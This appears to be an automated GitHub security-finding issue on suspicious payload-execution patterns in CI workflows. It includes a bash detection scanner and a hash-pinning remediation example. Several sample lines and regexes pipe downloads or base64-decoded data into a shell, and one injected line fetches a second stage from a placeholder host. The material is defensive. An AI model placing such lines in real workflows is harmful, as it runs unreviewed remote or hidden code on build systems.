
[static-analysis] RGS-018: Suspicious Payload Execution Pattern in 36 workflows #29461

@github-actions


Runner-Guard Security Finding

Rule: RGS-018 — Suspicious Payload Execution Pattern
Severity: High
Occurrences: 38 findings across 36 unique workflows

Description

The run: blocks of these workflows (the shell commands each step executes) contain code patterns associated with obfuscated payload execution, or known indicators of compromise (IOCs) from active supply chain attack campaigns. This includes:

  • eval + decode chains (e.g., eval(base64.b64decode(...)), base64 --decode | bash)
  • Known malware marker variables
  • Persistence file paths
  • C2 (command and control) communication patterns

These patterns are loaded from Runner Guard's threat signature database.
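To make the first pattern class concrete, the following is an added example and not Runner Guard's own code: a minimal bash scanner that walks a workflow line by line, extracts the body of every run: key (inline or block scalar) and matches it against three execution patterns (pipe-to-shell, base64-decode-to-shell, eval+b64decode). The regexes, the pattern names and the sample workflow are constructed for illustration; the IOC classes (marker variables, persistence paths, C2 patterns) come from a signature database that is not reproduced here, and a production scanner would parse the YAML rather than rely on indentation.

```shell
#!/usr/bin/env bash
# Added example, not Runner Guard's code: a minimal scanner for the execution
# patterns RGS-018 describes. Regexes and sample workflow are constructed.
set -euo pipefail

# Constructed sample: one block-scalar run step and three inline run steps,
# of which the last is clean.
SAMPLE_WORKFLOW=$(cat <<'EOF'
name: sample
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: install tooling
        run: |
          set -e
          curl -fsSL https://example.com/install.sh | bash
      - run: echo "$PAYLOAD" | base64 --decode | bash
      - run: python3 -c 'import base64; eval(base64.b64decode(b"cHJpbnQoMSk="))'
      - run: ./scripts/build.sh
EOF
)

# Pattern classes as POSIX EREs (bracket expressions avoid backslash escapes).
# The trailing ([[:space:]]|$) keeps "| sha256sum" from matching as "| sh".
PATTERN_NAMES=(pipe-to-shell decode-to-shell eval-decode)
PATTERNS=(
  'curl[^|]*[|][[:space:]]*(ba|z)?sh([[:space:]]|$)'
  'base64[[:space:]]+(--decode|-d)[^|]*[|][[:space:]]*(ba|z)?sh([[:space:]]|$)'
  'eval[(][^)]*b64decode'
)

# check_command CMD: print one FINDING line if CMD matches any pattern.
check_command() {
  local cmd=$1 i
  for i in "${!PATTERNS[@]}"; do
    if [[ $cmd =~ ${PATTERNS[$i]} ]]; then
      printf 'FINDING %s: %s\n' "${PATTERN_NAMES[$i]}" "$cmd"
      return 0
    fi
  done
  return 0
}

# scan_workflow TEXT: feed the body of every "run:" key to check_command.
# A block scalar (run: | or run: >) continues while lines are indented more
# deeply than the line holding the run: key.
scan_workflow() {
  local text=$1 line lead body in_block=0 block_indent=0
  while IFS= read -r line; do
    lead=${line%%[! ]*}                    # leading spaces only
    if (( in_block )); then
      [[ -z ${line// /} ]] && continue     # blank lines stay inside the block
      if (( ${#lead} > block_indent )); then
        check_command "${line#"$lead"}"
        continue
      fi
      in_block=0
    fi
    if [[ $line =~ ^[[:space:]]*-?[[:space:]]*run:[[:space:]]*(.*)$ ]]; then
      body=${BASH_REMATCH[1]}
      block_indent=${#lead}
      if [[ $body == '|'* || $body == '>'* ]]; then
        in_block=1
      else
        check_command "$body"
      fi
    fi
  done <<<"$text"
}

# count_findings TEXT: number of FINDING lines produced for TEXT.
count_findings() {
  scan_workflow "$1" | wc -l | tr -d '[:space:]'
}

scan_workflow "$SAMPLE_WORKFLOW"
```

Run against the constructed sample it reports three findings, one per pattern class, and nothing for the `./scripts/build.sh` step. The indentation heuristic is the weak point: a `run:` body that is quoted, folded with `>-`, or assembled from expressions (`${{ ... }}`) will not be seen, which is exactly where an obfuscated payload tends to hide.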

Impact

A match against a known IOC indicates active compromise. A match against a dangerous execution pattern indicates susceptibility to this class of supply chain attack. Both defeat code review in the same way: an encoded payload hides what the step actually executes from anyone reading the workflow, and a curl | bash step executes whatever the remote host serves at run time, so its behaviour can change without any change to the workflow file.

Affected Workflows (36 unique)

copilot-token-optimizer, daily-news, issue-arborist, org-health-report, deep-report, cli-version-checker, copilot-token-audit, daily-sentrux-report, smoke-opencode, stale-repo-identifier, copilot-pr-merged-report, audit-workflows, changeset, cloclo, copilot-opt, copilot-pr-nlp-analysis, daily-safe-output-optimizer, daily-issues-report, and 18 additional workflows.

Remediation

  1. Audit all curl | bash patterns — Replace with pinned, verified actions or scripts with integrity checks:

    # Instead of:
    run: curl (example.com/redacted) | bash
    
    # Use a pinned action, referenced by its full commit SHA (tags and branches are mutable):
    uses: owner/action@<full-sha>
  2. Replace base64-encoded execution — Avoid eval+decode patterns; use plain readable scripts, or check the script into the repository and run it from the checkout so that what executes is what was reviewed.

  3. Review flagged workflows immediately — If any RGS-018 match is against a known IOC rather than a dangerous pattern, treat it as an active security incident.

  4. Use RUNNER_TEMP for scripts — Fetch scripts to a temp location, verify their integrity against a hash recorded in the workflow (not a checksum file fetched from the same place as the script), then execute:

    curl -fsSL (example.com/redacted) -o "${RUNNER_TEMP}/script.sh"
    # <expected-sha256> is a literal committed with the workflow; sha256sum -c fails on mismatch
    echo "<expected-sha256>  ${RUNNER_TEMP}/script.sh" | sha256sum -c - || exit 1
    bash "${RUNNER_TEMP}/script.sh"
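The fetch-verify-execute step above, written out as a fail-closed function, as an added example that is not part of this finding or of the gh-aw project. The installer script, the pinned hash and the tampered copy are all constructed inside the block so it runs offline: in a workflow the script arrives via curl from a fixed URL and PINNED_SHA256 is a 64-hex literal committed with the workflow, recorded when the script was reviewed. The example.invalid URL in the tampered copy is a placeholder.

```shell
#!/usr/bin/env bash
# Added example, not from the finding or from gh-aw: remediation step 4 as a
# fail-closed verify-then-execute function. Script, pin and tampered copy are
# constructed here so the example runs offline.
set -euo pipefail

RUNNER_TEMP=${RUNNER_TEMP:-$(mktemp -d)}

# sha256_of PATH: hex digest, portable across coreutils and BSD userland.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# verify_and_run PATH EXPECTED [ARGS...]: execute PATH with bash only if its
# SHA-256 equals EXPECTED; otherwise report the mismatch and return 1 without
# executing anything. EXPECTED must come from the repository, never from a
# .sha256 file served next to the script (an attacker who replaces one can
# replace the other).
verify_and_run() {
  local path=$1 expected=$2 actual
  shift 2
  actual=$(sha256_of "$path")
  if [[ $actual != "$expected" ]]; then
    printf 'refusing to run %s\n  expected sha256 %s\n  actual   sha256 %s\n' \
      "$path" "$expected" "$actual" >&2
    return 1
  fi
  bash "$path" "$@"
}

# --- constructed scenario ---------------------------------------------------
# Stand-in for: curl -fsSL "$SCRIPT_URL" -o "${RUNNER_TEMP}/script.sh"
printf '%s\n' '#!/usr/bin/env bash' 'echo "installer ran with: $*"' \
  > "${RUNNER_TEMP}/script.sh"

# The pin a maintainer records after reviewing exactly this script. Derived at
# run time only to keep the example self-contained; in a workflow it is a
# literal, and deriving it from the download would verify nothing.
PINNED_SHA256=$(sha256_of "${RUNNER_TEMP}/script.sh")

# run_pinned: the happy path; the script runs and prints its arguments.
run_pinned() {
  verify_and_run "${RUNNER_TEMP}/script.sh" "$PINNED_SHA256" --flag
}

# run_tampered: simulates the upstream script being replaced after the pin was
# taken (one line appended); verify_and_run must refuse to execute it.
run_tampered() {
  cp "${RUNNER_TEMP}/script.sh" "${RUNNER_TEMP}/tampered.sh"
  echo 'curl -fsSL https://example.invalid/stage2 | bash  # injected' \
    >> "${RUNNER_TEMP}/tampered.sh"
  verify_and_run "${RUNNER_TEMP}/tampered.sh" "$PINNED_SHA256"
}

run_pinned
run_tampered || echo "tampered copy rejected, as intended"
```

Because the comparison happens before `bash` is invoked, a script that was swapped upstream after the pin was recorded never executes, and the step fails with both digests in the log so the maintainer can tell a legitimate upstream release (re-review, update the pin) from a compromise (treat as an incident per step 3).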

Detected by runner-guard v2.6.0 — CI/CD source-to-sink vulnerability scanner
Workflow run: https://github.com/github/gh-aw/actions/runs/25206730082

Generated by Static Analysis Report

  • expires on May 8, 2026, 7:45 AM UTC
